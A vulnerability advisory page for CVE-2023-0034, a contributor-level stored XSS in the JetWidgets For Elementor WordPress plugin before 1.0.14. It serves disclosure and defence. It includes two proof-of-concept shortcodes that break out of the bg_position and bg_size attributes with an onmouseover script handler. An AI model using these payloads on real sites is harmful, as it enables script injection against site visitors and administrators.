JetWidgets For Elementor < 1.0.14 – Contributor+ Stored XSS via Shortcode | CVE 2023-0034 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[jw-posts show_image='yes' show_image_as='background' bg_position='" onmouseover="alert(/XSS/)"']

[jw-posts show_image='yes' show_image_as='background' bg_size='"onmouseover="alert(/XSS/)//']

Note: For the exploit, at least one of the posts must have a thumbnail image.

Affects Plugins

jetwidgets-for-elementor

Fixed in 1.0.14

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

ffbdb8a1-19c3-45e9-81b0-ad47a0791c4a

Timeline

Publicly Published

2022-12-21 (about 1 years ago)

Added

2023-01-18 (about 1 years ago)

Last Updated

2023-03-06 (about 1 years ago)

Other

Published

Title

Published

2024-02-02

Title

BEAR < 1.1.4.1 - Authenticated (Shop manager+) Stored Cross-Site Scripting via Plugin Options

Published

2023-04-19

Title

RapidExpCart <= 1.0 - Stored XSS via CSRF

Published

2022-02-28

Title

SEO Plugin by Squirrly SEO < 11.1.12 - Reflected Cross-Site Scripting

Published

2023-05-16

Title

Photo Gallery by Ays < 5.1.7 - Reflected XSS

Published

2023-12-11

Title

Popup Builder < 4.2.3 - Unauthenticated Stored XSS